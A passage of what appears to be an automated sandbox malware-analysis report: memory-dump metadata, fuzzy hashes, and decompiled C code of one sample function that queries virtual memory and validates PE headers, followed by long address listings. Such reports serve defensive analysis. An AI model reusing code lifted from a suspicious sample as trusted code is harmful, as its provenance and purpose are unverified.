                                                                                                                                                                                                    • Source File: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                    • Opcode ID: 2c3671ed2888d11389a3489a3acf21b34feebe86ea003b343dbce7b44561d74c
                                                                                                                                                                                                    • Instruction ID: fde2b2e78781ba253104df8f7c6741a9abd6a4d76e4f20c8288145ff03a0104b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c3671ed2888d11389a3489a3acf21b34feebe86ea003b343dbce7b44561d74c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB61E031B00636DFEB29CE2DD9D262A73A5EB85314F248629D917C7295E731F843C750
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                    			E004022E5(long _a4) {
                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                    				intOrPtr _v12;
                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                    				short* _v32;
                                                                                                                                                                                                    				void _v36;
                                                                                                                                                                                                    				void* _t57;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t61;
                                                                                                                                                                                                    				signed int _t62;
                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                    				signed int* _t68;
                                                                                                                                                                                                    				intOrPtr* _t69;
                                                                                                                                                                                                    				intOrPtr* _t71;
                                                                                                                                                                                                    				intOrPtr _t72;
                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                    				void* _t76;
                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                    				void* _t78;
                                                                                                                                                                                                    				void _t80;
                                                                                                                                                                                                    				signed int _t81;
                                                                                                                                                                                                    				signed int _t84;
                                                                                                                                                                                                    				signed int _t86;
                                                                                                                                                                                                    				short* _t87;
                                                                                                                                                                                                    				void* _t89;
                                                                                                                                                                                                    				signed int* _t90;
                                                                                                                                                                                                    				long _t91;
                                                                                                                                                                                                    				signed int _t93;
                                                                                                                                                                                                    				signed int _t94;
                                                                                                                                                                                                    				signed int _t100;
                                                                                                                                                                                                    				signed int _t102;
                                                                                                                                                                                                    				void* _t104;
                                                                                                                                                                                                    				long _t108;
                                                                                                                                                                                                    				signed int _t110;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_t108 = _a4;
                                                                                                                                                                                                    				_t76 =  *(_t108 + 8);
                                                                                                                                                                                                    				if((_t76 & 0x00000003) != 0) {
                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                    					return 0;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_a4 =  *[fs:0x4];
                                                                                                                                                                                                    				_v8 =  *[fs:0x8];
                                                                                                                                                                                                    				if(_t76 < _v8 || _t76 >= _a4) {
                                                                                                                                                                                                    					_t102 =  *(_t108 + 0xc);
                                                                                                                                                                                                    					__eflags = _t102 - 0xffffffff;
                                                                                                                                                                                                    					if(_t102 != 0xffffffff) {
                                                                                                                                                                                                    						_t91 = 0;
                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                    						_a4 = 0;
                                                                                                                                                                                                    						_t57 = _t76;
                                                                                                                                                                                                    						do {
                                                                                                                                                                                                    							_t80 =  *_t57;
                                                                                                                                                                                                    							__eflags = _t80 - 0xffffffff;
                                                                                                                                                                                                    							if(_t80 == 0xffffffff) {
                                                                                                                                                                                                    								goto L9;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t80 - _t91;
                                                                                                                                                                                                    							if(_t80 >= _t91) {
                                                                                                                                                                                                    								L20:
                                                                                                                                                                                                    								_t63 = 0;
                                                                                                                                                                                                    								L60:
                                                                                                                                                                                                    								return _t63;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                    							__eflags =  *(_t57 + 4);
                                                                                                                                                                                                    							if( *(_t57 + 4) != 0) {
                                                                                                                                                                                                    								_t12 =  &_a4;
                                                                                                                                                                                                    								 *_t12 = _a4 + 1;
                                                                                                                                                                                                    								__eflags =  *_t12;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t91 = _t91 + 1;
                                                                                                                                                                                                    							_t57 = _t57 + 0xc;
                                                                                                                                                                                                    							__eflags = _t91 - _t102;
                                                                                                                                                                                                    						} while (_t91 <= _t102);
                                                                                                                                                                                                    						__eflags = _a4;
                                                                                                                                                                                                    						if(_a4 == 0) {
                                                                                                                                                                                                    							L15:
                                                                                                                                                                                                    							_t81 =  *0x404178;
                                                                                                                                                                                                    							_t110 = _t76 & 0xfffff000;
                                                                                                                                                                                                    							_t58 = 0;
                                                                                                                                                                                                    							__eflags = _t81;
                                                                                                                                                                                                    							if(_t81 <= 0) {
                                                                                                                                                                                                    								L18:
                                                                                                                                                                                                    								_t104 = _t102 | 0xffffffff;
                                                                                                                                                                                                    								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                                                                                                                                                                                                    								__eflags = _t61;
                                                                                                                                                                                                    								if(_t61 < 0) {
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									__eflags = 0;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t62 = _a4;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                    									L59:
                                                                                                                                                                                                    									_t63 = _t104;
                                                                                                                                                                                                    									goto L60;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									__eflags = _v12 - 0x1000000;
                                                                                                                                                                                                    									if(_v12 != 0x1000000) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _v16 & 0x000000cc;
                                                                                                                                                                                                    									if((_v16 & 0x000000cc) == 0) {
                                                                                                                                                                                                    										L46:
                                                                                                                                                                                                    										_t63 = 1;
                                                                                                                                                                                                    										 *0x4041c0 = 1;
                                                                                                                                                                                                    										__eflags =  *0x4041c0;
                                                                                                                                                                                                    										if( *0x4041c0 != 0) {
                                                                                                                                                                                                    											goto L60;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t84 =  *0x404178;
                                                                                                                                                                                                    										__eflags = _t84;
                                                                                                                                                                                                    										_t93 = _t84;
                                                                                                                                                                                                    										if(_t84 <= 0) {
                                                                                                                                                                                                    											L51:
                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                    											if(_t93 != 0) {
                                                                                                                                                                                                    												L58:
                                                                                                                                                                                                    												 *0x4041c0 = 0;
                                                                                                                                                                                                    												goto L5;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t77 = 0xf;
                                                                                                                                                                                                    											__eflags = _t84 - _t77;
                                                                                                                                                                                                    											if(_t84 <= _t77) {
                                                                                                                                                                                                    												_t77 = _t84;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t94 = 0;
                                                                                                                                                                                                    											__eflags = _t77;
                                                                                                                                                                                                    											if(_t77 < 0) {
                                                                                                                                                                                                    												L56:
                                                                                                                                                                                                    												__eflags = _t84 - 0x10;
                                                                                                                                                                                                    												if(_t84 < 0x10) {
                                                                                                                                                                                                    													_t86 = _t84 + 1;
                                                                                                                                                                                                    													__eflags = _t86;
                                                                                                                                                                                                    													 *0x404178 = _t86;
                                                                                                                                                                                                    												}
                                                                                                                                                                                                    												goto L58;
                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                    												do {
                                                                                                                                                                                                    													_t68 = 0x404180 + _t94 * 4;
                                                                                                                                                                                                    													_t94 = _t94 + 1;
                                                                                                                                                                                                    													__eflags = _t94 - _t77;
                                                                                                                                                                                                    													 *_t68 = _t110;
                                                                                                                                                                                                    													_t110 =  *_t68;
                                                                                                                                                                                                    												} while (_t94 <= _t77);
                                                                                                                                                                                                    												goto L56;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_t69 = 0x40417c + _t84 * 4;
                                                                                                                                                                                                    										while(1) {
                                                                                                                                                                                                    											__eflags =  *_t69 - _t110;
                                                                                                                                                                                                    											if( *_t69 == _t110) {
                                                                                                                                                                                                    												goto L51;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											_t93 = _t93 - 1;
                                                                                                                                                                                                    											_t69 = _t69 - 4;
                                                                                                                                                                                                    											__eflags = _t93;
                                                                                                                                                                                                    											if(_t93 > 0) {
                                                                                                                                                                                                    												continue;
                                                                                                                                                                                                    											}
                                                                                                                                                                                                    											goto L51;
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										goto L51;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t87 = _v32;
                                                                                                                                                                                                    									__eflags =  *_t87 - 0x5a4d;
                                                                                                                                                                                                    									if( *_t87 != 0x5a4d) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                                                                                                                                                                                                    									__eflags =  *_t71 - 0x4550;
                                                                                                                                                                                                    									if( *_t71 != 0x4550) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                                                                                                                                                                                                    									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t78 = _t76 - _t87;
                                                                                                                                                                                                    									__eflags =  *((short*)(_t71 + 6));
                                                                                                                                                                                                    									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                                                                                                                                                                                                    									if( *((short*)(_t71 + 6)) <= 0) {
                                                                                                                                                                                                    										goto L59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                                                                                                                                                                                                    									__eflags = _t78 - _t72;
                                                                                                                                                                                                    									if(_t78 < _t72) {
                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                                                                                                                                                                                                    									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                                                                                                                                                                                                    										goto L46;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									__eflags =  *(_t89 + 0x27) & 0x00000080;
                                                                                                                                                                                                    									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                                                                                                                                                                                                    										goto L20;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									goto L46;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L16;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								L16:
                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t58 = _t58 + 1;
                                                                                                                                                                                                    								__eflags = _t58 - _t81;
                                                                                                                                                                                                    								if(_t58 < _t81) {
                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L18;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(_t58 <= 0) {
                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *0x4041c0 = 1;
                                                                                                                                                                                                    							__eflags =  *0x4041c0;
                                                                                                                                                                                                    							if( *0x4041c0 != 0) {
                                                                                                                                                                                                    								goto L5;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    							if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    								L32:
                                                                                                                                                                                                    								_t100 = 0;
                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                    								if(_t58 < 0) {
                                                                                                                                                                                                    									L34:
                                                                                                                                                                                                    									 *0x4041c0 = 0;
                                                                                                                                                                                                    									goto L5;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									L33:
                                                                                                                                                                                                    									_t90 = 0x404180 + _t100 * 4;
                                                                                                                                                                                                    									_t100 = _t100 + 1;
                                                                                                                                                                                                    									__eflags = _t100 - _t58;
                                                                                                                                                                                                    									 *_t90 = _t110;
                                                                                                                                                                                                    									_t110 =  *_t90;
                                                                                                                                                                                                    								} while (_t100 <= _t58);
                                                                                                                                                                                                    								goto L34;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t58 = _t81 - 1;
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(_t58 < 0) {
                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                    								__eflags = _t81 - 0x10;
                                                                                                                                                                                                    								if(_t81 < 0x10) {
                                                                                                                                                                                                    									_t81 = _t81 + 1;
                                                                                                                                                                                                    									__eflags = _t81;
                                                                                                                                                                                                    									 *0x404178 = _t81;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t58 = _t81 - 1;
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								goto L25;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							while(1) {
                                                                                                                                                                                                    								L25:
                                                                                                                                                                                                    								__eflags =  *((intOrPtr*)(0x404180 + _t58 * 4)) - _t110;
                                                                                                                                                                                                    								if( *((intOrPtr*)(0x404180 + _t58 * 4)) == _t110) {
                                                                                                                                                                                                    									break;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t58 = _t58 - 1;
                                                                                                                                                                                                    								__eflags = _t58;
                                                                                                                                                                                                    								if(_t58 >= 0) {
                                                                                                                                                                                                    									continue;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								break;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags = _t58;
                                                                                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                    									goto L34;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t75 =  *((intOrPtr*)(_t108 - 8));
                                                                                                                                                                                                    						__eflags = _t75 - _v8;
                                                                                                                                                                                                    						if(_t75 < _v8) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						__eflags = _t75 - _t108;
                                                                                                                                                                                                    						if(_t75 >= _t108) {
                                                                                                                                                                                                    							goto L20;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						goto L15;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L5:
                                                                                                                                                                                                    					_t63 = 1;
                                                                                                                                                                                                    					goto L60;
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					goto L3;
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}




































                                                                                                                                                                                                    0x004022ef
                                                                                                                                                                                                    0x004022f2
                                                                                                                                                                                                    0x004022f8
                                                                                                                                                                                                    0x00402316
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402316
                                                                                                                                                                                                    0x00402300
                                                                                                                                                                                                    0x00402309
                                                                                                                                                                                                    0x0040230f
                                                                                                                                                                                                    0x0040231e
                                                                                                                                                                                                    0x00402321
                                                                                                                                                                                                    0x00402324
                                                                                                                                                                                                    0x0040232e
                                                                                                                                                                                                    0x0040232e
                                                                                                                                                                                                    0x00402330
                                                                                                                                                                                                    0x00402333
                                                                                                                                                                                                    0x00402335
                                                                                                                                                                                                    0x00402335
                                                                                                                                                                                                    0x00402337
                                                                                                                                                                                                    0x0040233a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040233c
                                                                                                                                                                                                    0x0040233e
                                                                                                                                                                                                    0x004023a4
                                                                                                                                                                                                    0x004023a4
                                                                                                                                                                                                    0x00402502
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402502
                                                                                                                                                                                                    0x00402340
                                                                                                                                                                                                    0x00402340
                                                                                                                                                                                                    0x00402344
                                                                                                                                                                                                    0x00402346
                                                                                                                                                                                                    0x00402346
                                                                                                                                                                                                    0x00402346
                                                                                                                                                                                                    0x00402346
                                                                                                                                                                                                    0x00402349
                                                                                                                                                                                                    0x0040234a
                                                                                                                                                                                                    0x0040234d
                                                                                                                                                                                                    0x0040234d
                                                                                                                                                                                                    0x00402351
                                                                                                                                                                                                    0x00402355
                                                                                                                                                                                                    0x00402363
                                                                                                                                                                                                    0x00402363
                                                                                                                                                                                                    0x0040236b
                                                                                                                                                                                                    0x00402371
                                                                                                                                                                                                    0x00402373
                                                                                                                                                                                                    0x00402375
                                                                                                                                                                                                    0x00402385
                                                                                                                                                                                                    0x00402392
                                                                                                                                                                                                    0x00402396
                                                                                                                                                                                                    0x0040239b
                                                                                                                                                                                                    0x0040239d
                                                                                                                                                                                                    0x0040241b
                                                                                                                                                                                                    0x0040241b
                                                                                                                                                                                                    0x0040239f
                                                                                                                                                                                                    0x0040239f
                                                                                                                                                                                                    0x0040239f
                                                                                                                                                                                                    0x0040241d
                                                                                                                                                                                                    0x0040241f
                                                                                                                                                                                                    0x00402500
                                                                                                                                                                                                    0x00402500
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402425
                                                                                                                                                                                                    0x00402425
                                                                                                                                                                                                    0x0040242c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402432
                                                                                                                                                                                                    0x00402436
                                                                                                                                                                                                    0x00402492
                                                                                                                                                                                                    0x00402494
                                                                                                                                                                                                    0x0040249c
                                                                                                                                                                                                    0x0040249e
                                                                                                                                                                                                    0x004024a0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024a2
                                                                                                                                                                                                    0x004024a8
                                                                                                                                                                                                    0x004024aa
                                                                                                                                                                                                    0x004024ac
                                                                                                                                                                                                    0x004024c1
                                                                                                                                                                                                    0x004024c1
                                                                                                                                                                                                    0x004024c3
                                                                                                                                                                                                    0x004024f2
                                                                                                                                                                                                    0x004024f9
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024f9
                                                                                                                                                                                                    0x004024c7
                                                                                                                                                                                                    0x004024c8
                                                                                                                                                                                                    0x004024ca
                                                                                                                                                                                                    0x004024cc
                                                                                                                                                                                                    0x004024cc
                                                                                                                                                                                                    0x004024ce
                                                                                                                                                                                                    0x004024d0
                                                                                                                                                                                                    0x004024d2
                                                                                                                                                                                                    0x004024e6
                                                                                                                                                                                                    0x004024e6
                                                                                                                                                                                                    0x004024e9
                                                                                                                                                                                                    0x004024eb
                                                                                                                                                                                                    0x004024eb
                                                                                                                                                                                                    0x004024ec
                                                                                                                                                                                                    0x004024ec
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024d4
                                                                                                                                                                                                    0x004024d4
                                                                                                                                                                                                    0x004024d4
                                                                                                                                                                                                    0x004024dd
                                                                                                                                                                                                    0x004024de
                                                                                                                                                                                                    0x004024e0
                                                                                                                                                                                                    0x004024e2
                                                                                                                                                                                                    0x004024e2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024d4
                                                                                                                                                                                                    0x004024d2
                                                                                                                                                                                                    0x004024ae
                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                    0x004024b7
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024b9
                                                                                                                                                                                                    0x004024ba
                                                                                                                                                                                                    0x004024bd
                                                                                                                                                                                                    0x004024bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024bf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004024b5
                                                                                                                                                                                                    0x00402438
                                                                                                                                                                                                    0x0040243b
                                                                                                                                                                                                    0x00402440
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402449
                                                                                                                                                                                                    0x0040244b
                                                                                                                                                                                                    0x00402451
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402457
                                                                                                                                                                                                    0x0040245d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402463
                                                                                                                                                                                                    0x00402465
                                                                                                                                                                                                    0x0040246e
                                                                                                                                                                                                    0x00402472
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402478
                                                                                                                                                                                                    0x0040247b
                                                                                                                                                                                                    0x0040247d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402484
                                                                                                                                                                                                    0x00402486
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402488
                                                                                                                                                                                                    0x0040248c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040248c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x00402377
                                                                                                                                                                                                    0x0040237e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402380
                                                                                                                                                                                                    0x00402381
                                                                                                                                                                                                    0x00402383
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402383
                                                                                                                                                                                                    0x004023ab
                                                                                                                                                                                                    0x004023ad
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023bd
                                                                                                                                                                                                    0x004023bf
                                                                                                                                                                                                    0x004023c1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023c7
                                                                                                                                                                                                    0x004023ce
                                                                                                                                                                                                    0x004023fa
                                                                                                                                                                                                    0x004023fa
                                                                                                                                                                                                    0x004023fc
                                                                                                                                                                                                    0x004023fe
                                                                                                                                                                                                    0x00402412
                                                                                                                                                                                                    0x00402414
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402400
                                                                                                                                                                                                    0x00402400
                                                                                                                                                                                                    0x00402400
                                                                                                                                                                                                    0x00402409
                                                                                                                                                                                                    0x0040240a
                                                                                                                                                                                                    0x0040240c
                                                                                                                                                                                                    0x0040240e
                                                                                                                                                                                                    0x0040240e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402400
                                                                                                                                                                                                    0x004023d0
                                                                                                                                                                                                    0x004023d3
                                                                                                                                                                                                    0x004023d5
                                                                                                                                                                                                    0x004023e7
                                                                                                                                                                                                    0x004023e7
                                                                                                                                                                                                    0x004023ea
                                                                                                                                                                                                    0x004023ec
                                                                                                                                                                                                    0x004023ec
                                                                                                                                                                                                    0x004023ed
                                                                                                                                                                                                    0x004023ed
                                                                                                                                                                                                    0x004023f3
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023d7
                                                                                                                                                                                                    0x004023d7
                                                                                                                                                                                                    0x004023d7
                                                                                                                                                                                                    0x004023de
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023e0
                                                                                                                                                                                                    0x004023e0
                                                                                                                                                                                                    0x004023e1
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023e1
                                                                                                                                                                                                    0x004023e3
                                                                                                                                                                                                    0x004023e5
                                                                                                                                                                                                    0x004023f8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023f8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x004023e5
                                                                                                                                                                                                    0x00402357
                                                                                                                                                                                                    0x0040235a
                                                                                                                                                                                                    0x0040235d
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x0040235f
                                                                                                                                                                                                    0x00402361
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00402361
                                                                                                                                                                                                    0x00402326
                                                                                                                                                                                                    0x00402328
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 00402396
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.622657691.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.622723835.0000000000405000.00000040.00020000.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2850889275-0
                                                                                                                                                                                                    • Opcode ID: f4d17983e0897064a5a1a208ac14f8b2983dafa849c33abb48600c6344ab3f38
                                                                                                                                                                                                    • Instruction ID: 6700599f820e315c4bc252b094e1a85545547419cb78864a82dc3b03df8008ba
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f4d17983e0897064a5a1a208ac14f8b2983dafa849c33abb48600c6344ab3f38
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB61D4306006119BDB29CE39DF9C62A73A5EB95314B24817BDD06FB2D0E3BCDC82865C
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627309822.0000000004E10000.00000040.00000001.sdmp, Offset: 04E10000, based on PE: false
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: t32c
                                                                                                                                                                                                    • API String ID: 0-3674199949
                                                                                                                                                                                                    • Opcode ID: 44ed16cafdb322d2c80e311cc225c529adbf3c3b99a874936ceae66e7a6a7ccd
                                                                                                                                                                                                    • Instruction ID: 5a55981853862ed57b7f3af7f55ebed8297016a7535b3d02802945f7af2655e1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ed16cafdb322d2c80e311cc225c529adbf3c3b99a874936ceae66e7a6a7ccd
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2DD11676A40219EFDF24CF90CC80BAAB7B5FF89314F149295E509AB525D330AA85CF51
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000001.00000002.627740399.0000000004F6D000.00000004.00000001.sdmp, Offset: 04F60000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000001.00000002.627625918.0000000004F60000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627661838.0000000004F61000.00000020.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627709489.0000000004F6C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    • Associated: 00000001.00000002.627760603.0000000004F6F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                    • Opcode ID: 69969da3e5f25e517399d62b05eaa08ebb0370a71e65700aaeab7bf355088135
                                                                                                                                                                                                    • Instruction ID: 523d07b54a03a80c795f8e83ede1f440cdb6f5f40dd1ac1f4bc85b8606003873
